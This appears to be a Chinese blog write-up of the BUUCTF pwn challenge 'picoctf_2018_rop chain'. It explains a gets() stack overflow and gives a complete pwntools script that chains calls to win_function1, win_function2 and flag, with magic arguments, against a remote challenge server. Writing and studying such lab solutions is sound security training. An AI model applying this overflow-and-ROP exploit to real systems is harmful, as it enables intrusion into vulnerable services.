[BUUCTF-pwn]——picoctf_2018_rop chain

  • 题目地址: https://buuoj.cn/challenges#picoctf_2018_rop%20chain

checksec看看,开启了NX,但是没有canary

IDA中查看一下

发现gets函数,可以栈溢出

发现flag,不过需要满足条件,才可以获得

接着找可能用到的函数

接着找到对应函数的地址

思路

利用栈溢出,构造rop链,首先将win1 = 1, 然后 win2 = 1,最后获得flag

exploit

from pwn import *
p = remote("node3.buuoj.cn",25806)
win_function1 = 0x080485CB
win_function2 = 0x080485D8
flag = 0x0804862B
vuln = 0x08048714
payload = 'a' * (0x18 + 4) + p32(win_function1) + p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
p.sendlineafter("Enter your input> ", payload)
p.interactive()

想要知道0xBAAAAAAD 和 0xDEADBAAD怎么来的,可以

点击我查看

https://blog.csdn.net/Y_peak/article/details/114004550

[BUUCTF-pwn]——picoctf_2018_rop chain相关推荐

  1. BUUCTF pwn——picoctf_2018_rop chain

    checksec && 运行 ida main函数调用vuln函数 名为vuln的函数存在溢出 名为flag的函数,通过校验可直接getflag 具体校验过程看图,只有win1和win ...

  2. Buuctf(pwn) picoctf_2018_rop chain 栈溢出

    32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...

  3. 持续更新 BUUCTF——PWN(一)

    文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

  4. BUUCTF Pwn warmup

    BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...

  5. BUUCTF PWN rip1 WP

    BUUCTF   PWN   rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...

  6. buuctf pwn bjdctf_2020_babyrop

    buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...

  7. 持续更新 BUUCTF——PWN(二)

    文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

  8. 持续更新 BUUCTF——PWN(三)

    文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...

  9. BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

    思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...

最新文章

  1. 华为nova好不好 先看图
  2. SpringMVC介绍之约定优于配置
  3. 学习 shell —— 条件判断 if 的参数
  4. 数据治理的陷阱与解决方案
  5. SQL Server 2008空间数据应用系列十:使用存储过程生成GeoRSS聚合空间信息
  6. Java对接百度翻译API
  7. 腾讯云推出“版权音乐助手”让音乐版权使用“按量付费“
  8. 【IE知识】最系统、完整的标准工时学习资料;标准作业(SOP)详解;生产线布局规划
  9. 使用Mono Cecil对MSIL进行注入
  10. Unity发布项目,记录日志并写入文件。
  11. php股票t 0,股票T+0是什么意思?如何看懂股票T+0?
  12. 推荐算法(推广搜)——广告和推荐有什么不同?
  13. node.js 基础(含mongodb,express,express-art-template)
  14. shouldoverrideurlloading为什么有时候不走_心理学:为什么很多看似不般配的人,往往都能走到最后?...
  15. Java JDK 安装方法---阿哲专属版
  16. QUIC 协议在蚂蚁集团落地总结
  17. U盘写保护怎么办 -----成功解除保护
  18. 大厂面试系列一些问题的解答
  19. Ubuntu安装anaconda做英文词云
  20. Subversion

热门文章

  1. xshell链接kali
  2. 2015年第六届蓝桥杯 - 省赛 - C/C++大学B组 - H.移动距离
  3. scp: /usr/java: Permission denied
  4. 信息学奥赛一本通(C++)在线评测系统——基础(一)C++语言——1106:年龄与疾病
  5. 大数据WEB阶段Spring框架(三)声明式事务处理
  6. 【MFC】带图标的工具栏
  7. 【STM32】GPIO概述
  8. 【Centos】Centos7.5取消自动锁屏功能
  9. blob html 预览_本地图片预览+blob使用
  10. css a标签去掉下划线_CSS入门知识汇总